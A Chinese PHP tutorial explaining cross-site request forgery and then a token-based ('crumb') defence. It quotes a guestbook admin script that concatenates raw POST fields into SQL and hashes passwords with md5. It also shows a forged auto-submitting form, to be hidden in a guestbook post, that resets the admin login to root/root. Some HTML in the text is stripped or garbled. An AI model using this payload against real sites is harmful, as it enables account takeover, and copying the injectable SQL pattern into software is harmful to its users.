php漏洞之跨网站请求伪造与防止伪造方法

今天我来给大家介绍在php中跨网站请求伪造的实现方法与最后我们些常用的防止伪造的具体操作方法,有需要了解的朋友可进入参考.

伪造跨站请求介绍

伪造跨站请求比较难以防范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等,这种攻击常见的表现形式有:

伪造链接,引诱用户点击,或是让用户在不知情的情况下访问. 

伪造表单,引诱用户提交,表单可以是隐藏的,用图片或链接的形式伪装.

比较常见而且也很廉价的防范手段是在所有可能涉及用户写操作的表单中加入一个随机且变换频繁的字符串，然后在处理表单的时候对这个字符串进行检查。这个随机字符串如果和当前用户身份相关联的话，那么攻击者伪造请求会比较麻烦.

如果攻击者以隐藏的方式发送给目标用户链接

,那么如果目标用户不小心访问以后,购买的数量就成了1000个.

1. //pass.php 
2. if($_GET["act"]) 
3. { 
4. $username=$_POST["username"]; 
5. $sh=$_POST["sh"]; 
6. $gg=$_POST["gg"]; 
7. $title=$_POST["title"]; 
8. $copyright=$_POST["copyright"]."
   设计制作：厦门随缘网络科技"; 
9. $password=md5($_POST["password"]); 
10. if(emptyempty($_POST["password"])) 
11. { 
12. $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; 
13. } 
14. else 
15. { 
16. $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; 
17. } 
18. mysql_query($sql); 
19. mysql_close($conn); 
20. echo "";  
21. echo "alert('修改成功！');"; 
22. echo " location='pass.php';";  
23. echo ""; 
24. } 
25. 这个文件用于修改管理密码和网站设置的一些信息，我们可以直接构造如下表单: 
26.  
27. "http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
28. "radio" value="1"  name="sh"> 
29. "radio" name="sh" checked value="0">  
30. "text" name="username" value="root"> 
31. "password" name="password" value="root">  
32. "text"  name="title"  value="随缘网络PHP留言板V1.0(带审核功能)" > 
33. "gg"  rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)！ 
34. "copyright"  rows="6" cols="80" >随缘网络PHP留言本V1.0  版权所有：厦门随缘网络科技 2005-2009
    承接网站建设及系统定制 提供优惠主机域名 
35.  
36.   

存为attack.html,放到自己网站上http://www.phpfensi.com此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root.

防止伪造跨站请求

yahoo对付伪造跨站请求的办法是在表单里加入一个叫.crumb的随机串;而facebook也有类似的解决办法,它的表单里常常会有post_form_id和fb_dtsg.

随机串代码实现,咱们按照这个思路,山寨一个crumb的实现,代码如下:

1. class Crumb {  
2. CONST SALT = "your-secret-salt";  
3. static $ttl = 7200;  
4. static public function challenge($data) {  
5. return hash_hmac('md5', $data, self::SALT);  
6. }  
7. static public function issueCrumb($uid, $action = -1) {  
8. $i = ceil(time() / self::$ttl);  
9. return substr(self::challenge($i . $action . $uid), -12, 10);  
10. }  
11. static public function verifyCrumb($uid, $crumb, $action = -1) {  
12. $i = ceil(time() / self::$ttl);  
13. if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb ||  
14. substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb)  
15. return true;  
16. return false;  
17. }  
18. } 

代码中的$uid表示用户唯一标识,而$ttl表示这个随机串的有效时间.

应用示例,构造表单,在表单中插入一个隐藏的随机串crumb,代码如下:

1. <form method="post" action="demo.php">  
2. <input type="hidden" name="crumb" value="">  
3. <input type="text" name="content">  
4. <input type="submit">  
5. form> 

处理表单 demo.php,对crumb进行检查,代码如下:

2. if(Crumb::verifyCrumb($uid, $_POST['crumb'])) {  
3. //按照正常流程处理表单  
4. } else {  
5. //crumb校验失败，错误提示流程  
6. }  
7. ?>